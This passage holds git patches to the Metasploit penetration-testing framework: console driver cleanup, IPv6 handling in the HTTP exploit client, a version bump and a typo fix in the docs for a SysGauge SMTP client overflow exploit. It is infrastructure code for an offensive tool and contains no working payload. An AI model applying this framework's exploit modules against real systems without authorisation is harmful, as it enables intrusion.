if(not s.respond_to?('bind')) - $stderr.puts "*** JRuby 1.5.0+ is required to use Metasploit with jRuby" - exit(0) - end - - $stderr.puts "*** Warning: JRuby support is still incomplete, few things will work properly!" - trap Signal::list['INT'] do - Thread.main.raise Interrupt.new - end - - s.close -end - -# Check for OpenSSL and print a warning if it is not installed -begin - require 'openssl' -rescue ::LoadError - $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!" - $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more" -end diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index 1e303bf4ee..fd53c3278b 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -138,15 +138,6 @@ class Driver < Msf::Ui::Driver print_error("***") end - begin - require 'openssl' - rescue ::LoadError - print_error("***") - print_error("* WARNING: No OpenSSL support. This is required by meterpreter payloads and many exploits") - print_error("* Please install the ruby-openssl package (apt-get install libopenssl-ruby on Debian/Ubuntu") - print_error("***") - end - # Register event handlers register_event_handlers @@ -191,24 +182,10 @@ class Driver < Msf::Ui::Driver end end - # framework.db.active will be true if after_establish_connection ran directly when connection_established? was - # already true or if framework.db.connect called after_establish_connection. - if !! framework.db.error - if framework.db.error.to_s =~ /RubyGem version.*pg.*0\.11/i - print_error("***") - print_error("*") - print_error("* Metasploit now requires version 0.11 or higher of the 'pg' gem for database support") - print_error("* There a three ways to accomplish this upgrade:") - print_error("* 1. If you run Metasploit with your system ruby, simply upgrade the gem:") - print_error("* $ rvmsudo gem install pg ") - print_error("* 2. Use the Community Edition web interface to apply a Software Update") - print_error("* 3. Uninstall, download the latest version, and reinstall Metasploit") - print_error("*") - print_error("***") - print_error("") - print_error("") - end - + # framework.db.active will be true if after_establish_connection ran + # directly when connection_established? was already true or if + # framework.db.connect called after_establish_connection. + if !!framework.db.error print_error("Failed to connect to the database: #{framework.db.error}") end end @@ -250,108 +227,6 @@ class Driver < Msf::Ui::Driver end end - # - # Configure a default output path for jUnit XML output - # - def junit_setup(output_path) - output_path = ::File.expand_path(output_path) - - ::FileUtils.mkdir_p(output_path) - @junit_output_path = output_path - @junit_error_count = 0 - print_status("Test Output: #{output_path}") - - # We need at least one test success in order to pass - junit_pass("framework_loaded") - end - - # - # Emit a new jUnit XML output file representing an error - # - def junit_error(tname, ftype, data = nil) - - if not @junit_output_path - raise RuntimeError, "No output path, call junit_setup() first" - end - - data ||= framework.inspect.to_s - - e = REXML::Element.new("testsuite") - - c = REXML::Element.new("testcase") - c.attributes["classname"] = "msfrc" - c.attributes["name"] = tname - - f = REXML::Element.new("failure") - f.attributes["type"] = ftype - - f.text = data - c << f - e << c - - bname = ("msfrpc_#{tname}").gsub(/[^A-Za-z0-9\.\_]/, '') - bname << "_" + Digest::MD5.hexdigest(tname) - - fname = ::File.join(@junit_output_path, "#{bname}.xml") - cnt = 0 - while ::File.exist?( fname ) - cnt += 1 - fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml") - end - - ::File.open(fname, "w") do |fd| - fd.write(e.to_s) - end - - print_error("Test Error: #{tname} - #{ftype} - #{data}") - end - - # - # Emit a new jUnit XML output file representing a success - # - def junit_pass(tname) - - if not @junit_output_path - raise RuntimeError, "No output path, call junit_setup() first" - end - - # Generate the structure of a test case run - e = REXML::Element.new("testsuite") - c = REXML::Element.new("testcase") - c.attributes["classname"] = "msfrc" - c.attributes["name"] = tname - e << c - - # Generate a unique name - bname = ("msfrpc_#{tname}").gsub(/[^A-Za-z0-9\.\_]/, '') - bname << "_" + Digest::MD5.hexdigest(tname) - - # Generate the output path, allow multiple test with the same name - fname = ::File.join(@junit_output_path, "#{bname}.xml") - cnt = 0 - while ::File.exist?( fname ) - cnt += 1 - fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml") - end - - # Write to our test output location, as specified with junit_setup - ::File.open(fname, "w") do |fd| - fd.write(e.to_s) - end - - print_good("Test Pass: #{tname}") - end - - - # - # Emit a jUnit XML output file and throw a fatal exception - # - def junit_fatal_error(tname, ftype, data) - junit_error(tname, ftype, data) - print_error("Exiting") - run_single("exit -y") - end - # # Loads configuration that needs to be analyzed before the framework # instance is created. From 912fbc3b8ca45db1d1edcedc00b98bb21a103439 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Wed, 6 Dec 2017 20:34:40 +0100 Subject: [PATCH 251/254] add docker pull badge to readme --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 16b401ac91..849f6107cd 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) +Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/) == The Metasploit Framework is released under a BSD-style license. See COPYING for more details. From 2565ad6a27a3dac7367f22dc836fe66d41bfaaeb Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 7 Dec 2017 12:56:55 -0600 Subject: [PATCH 252/254] Handle IPv6 addresses in full_uri (add brackets) --- lib/msf/core/exploit/http/client.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index daa6ac6f83..a7194c8bb1 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -474,7 +474,13 @@ module Exploit::Remote::HttpClient uri = normalize_uri(custom_uri || target_uri.to_s) - "#{uri_scheme}://#{rhost}#{uri_port}#{uri}" + if Rex::Socket.is_ipv6?(rhost) + uri_host = "[#{rhost}]" + else + uri_host = rhost + end + + "#{uri_scheme}://#{uri_host}#{uri_port}#{uri}" end # From 348cbe54b6f56b0dce406da4512d2bfdf6059913 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 8 Dec 2017 10:01:55 -0800 Subject: [PATCH 253/254] Bump version of framework to 4.16.23 --- Gemfile.lock | 6 +++--- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 02a3d0af4e..5005305830 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.22) + metasploit-framework (4.16.23) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -138,7 +138,7 @@ GEM multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.7.2) + grpc (1.7.3) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) googleauth (>= 0.5.1, < 0.7) @@ -193,7 +193,7 @@ GEM method_source (0.9.0) mini_portile2 (2.3.0) minitest (5.10.3) - msgpack (1.1.0) + msgpack (1.2.0) multi_json (1.12.2) multipart-post (2.0.0) nessus_rest (0.1.6) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index ce52cf1258..22c37e115b 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.22" + VERSION = "4.16.23" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 3a14ac3b37ebcdf7cb4e0bf5424190e1eb9d7c0c Mon Sep 17 00:00:00 2001 From: Chris Higgins Date: Sat, 9 Dec 2017 02:30:42 -0600 Subject: [PATCH 254/254] Fixed a spelling error in documentation --- .../modules/exploit/windows/smtp/sysgauge_client_bof.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md index d422147189..467f8c3603 100644 --- a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md +++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md @@ -4,7 +4,7 @@ via its SMTP server validation. The module sends a malicious response along in the 220 service ready response and exploits the client, resulting in an unprivileged shell. - he software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe). + The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe). ## Verification Steps